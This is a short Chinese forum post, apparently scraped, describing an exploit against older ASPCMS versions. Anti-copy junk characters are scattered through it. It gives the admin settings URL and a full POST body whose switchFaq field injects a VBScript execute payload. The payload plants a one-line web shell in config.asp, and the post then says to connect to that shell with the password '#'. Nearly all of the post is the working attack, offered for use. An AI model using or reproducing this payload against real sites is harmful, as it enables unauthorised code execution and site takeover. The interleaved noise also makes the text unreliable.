老的ASPCMS版本的秒杀拿SHELL漏洞5 t ~: l+ Q- c+ f4 K, H: w7 F. I
+ h3 Y( n' C: @7 n- F/ J3 t
找到后台。。。然后
6 ]9 t# C9 i* w0 D8 V- _- r. e % f, j x: {1 R; \) `1 B
/admin/_system/AspCms_SiteSetting.asp?action=saves+ \7 V4 F/ B- Z& F% c7 y' S
+ n1 N) F' y% D" \0 ?" s; \7 {8 X直接POST9 b/ o5 F6 F `) t$ K: E
: _7 e4 {- K3 {+ a Y+ S* B D" T! j
runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1
* _7 ^7 H7 Y8 m) V c
v) D# _/ A5 ~2 @" H' R! g0 ^再连接配置文件config.asp 密码为#4 [5 }0 a+ [3 y
|